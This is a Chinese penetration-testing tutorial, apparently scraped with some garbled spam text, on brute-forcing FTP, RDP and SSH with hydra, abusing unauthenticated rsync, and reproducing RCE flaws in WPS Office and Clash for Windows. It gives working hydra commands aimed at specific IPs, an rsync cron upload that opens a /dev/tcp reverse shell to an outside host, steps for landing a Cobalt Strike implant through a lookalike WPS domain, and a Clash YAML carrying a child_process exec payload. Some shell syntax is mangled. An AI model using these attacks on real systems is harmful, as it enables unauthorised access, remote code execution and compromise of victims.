公司网站制作与推广,1688做网站费用,免费的h5场景制作平台,怎样做网络推广话术目录
端口协议-口令爆破未授权
弱口令爆破
FTP#xff1a;文件传输协议
RDP#xff1a;Windows远程桌面协议
SSH#xff1a;Linux安全外壳协议
未授权案例(rsync)
桌面应用-QQWPSClash
QQ RCE 漏洞复现
WPS RCE 漏洞复现
Clas* RCE 漏洞复现 知识点…目录
端口协议-口令爆破未授权
弱口令爆破
FTP文件传输协议
RDPWindows远程桌面协议
SSHLinux安全外壳协议
未授权案例(rsync)
桌面应用-QQWPSClash
QQ RCE 漏洞复现
WPS RCE 漏洞复现
Clas* RCE 漏洞复现 知识点; 1、端口协议-弱口令未授权攻击方式等 2、桌面应用-社交类文档类工具类等 常见语言开发框架
PHPThinkphp Laravel YII CodeIgniter CakePHP Zend等JAVASpring MyBatis Hibernate Struts2 Springboot等PythonDjango Flask Bottle Turbobars Tornado Web2py等JavascriptVue.js Node.js Bootstrap JQuery Angular等
常见语言开发组件(Java) Apache Solr、Apache Shiro、Apache Struts2、Apache Flink、Flume、Dubbo、Redis、Logstash、ElasticSearch、Kafka、Ghidra、Minecraft、Apache hive、Datax、Streaming、Dolphin Scheduler、Storm、Spring、Aibaba FastJson、Jackson、Log4J、XSteam等。 端口协议-口令爆破未授权
端口参考https://mp.weixin.qq.com/s/xp_LOUmGImrRmkPrDqxKjw 弱口令爆破
服务爆破工具https://github.com/vanhauser-thc/thc-hydra hydra是一个自动化的爆破工具暴力破解弱密码
是一个支持众多协议的爆破工具已经集成到KaliLinux中直接在终端打开即可
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写指定密码破解少用一般是采用密码字典。
-P FILE 大写指定密码字典。
-e ns 可选选项n空密码试探s使用指定用户和密码试探。
-C FILE 使用冒号分割格式例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数默认为16。
-w TIME 设置最大超时的时间单位秒默认是30s。
-v / -V 显示详细过程。
server 目标ipservice 指定服务名支持的服务和协议telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。FTP文件传输协议
hydra -l test -P 10top1K.txt 47.110.53.159 ftp -VFTP的上传下载文件命令可以百度 RDPWindows远程桌面协议
hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V有时候目标可能会用到第三方远程控制软件(vnc、向日葵、TeamViewer等)而不用系统本身的rdp协议。
因为这些第三方远程控制软件的控制效果要比原始的rdp协议更好所以会出现这种情况。 SSHLinux安全外壳协议
hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V未授权案例(rsync)
未授权检测工具https://github.com/xk11z/unauthorized rsync是Linux下一款数据备份工具支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口如果目标开启了rsync服务并且没有配置ACL或访问密码我们将可以读写目标服务器文件。 判断
rsync rsync://120.27.220.186:57830/利用-读取文件
rsync rsync://120.27.220.186:57830/src/下载文件;
rsync rsync://120.27.220.186:57830/src/etc/passwd ./ (./是下载到本地的路径)上传文件
rsync -av passwd rsync://120.27.220.186:57830/src/tmp/passwd反弹shell
获取信息
rsync rsync://120.27.220.186:57830/src/etc/crontab /root/cron.txt创建文件
touch shell
#!/bin/bash
/bin/bash -i /dev/tcp/47.94.236.117/5566 01
chmod x shell上传文件
rsync -av shell rsync://120.27.220.186:57830/src/etc/cron.hourly 等待接受反弹需要等待比较久因为cron.hourly 固定了每小时执行一次 其中
17 * * * * root cd / run-parts --report /etc/cron.hourly表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令桌面应用-QQWPSClash
QQ RCE 漏洞复现 上线cs后门同理 WPS RCE 漏洞复现
影响版本
WPS Office 代码执行(QVD-2023-17241)WPS Office 2023个人版11.1.0.15120WPS Office 2019企业版11.8.2.12085
RCE复现(弹计算器) 127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn上线CS
1、简单分析1.html poc.docx
1.html poc.docx 修改配合联动上线CS 修改html中的shellcode(C#) 修改docx中的指向连接URL及修改本地hosts 如何修改docx中的指向连接URL 实战中怎么操作
VPS上申请{xxxxx}wps.cn域名 域名上增加解析clientweb.docer.wps.cn.{xxxxx}wps.cn VPSIP上面
VPSIP架设1.html网站服务修改1.html上线shellcode Clas* RCE 漏洞复现
前言本文内容仅为技术科普请勿用于非法用途仅展示漏洞 影响版本Windows v0.19.10版本及以下
本地创立一个.yaml的文件
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:- name: aimg/src1/onerroreval(require(child_process).exec(calc.exe););type: socks5server: 127.0.0.1port: 17938skip-cert-verify: true- name: abctype: socks5server: 127.0.0.1port: 8088skip-cert-verify: true
proxy-groups:-name: img/src1/onerroreval(require(child_process).exec(calc.exe););type: selectproxies:- aimg/src1/onerroreval(require(child_process).exec(calc.exe););Profiles挑选导入.yaml 切换节点之后成功调用代码执行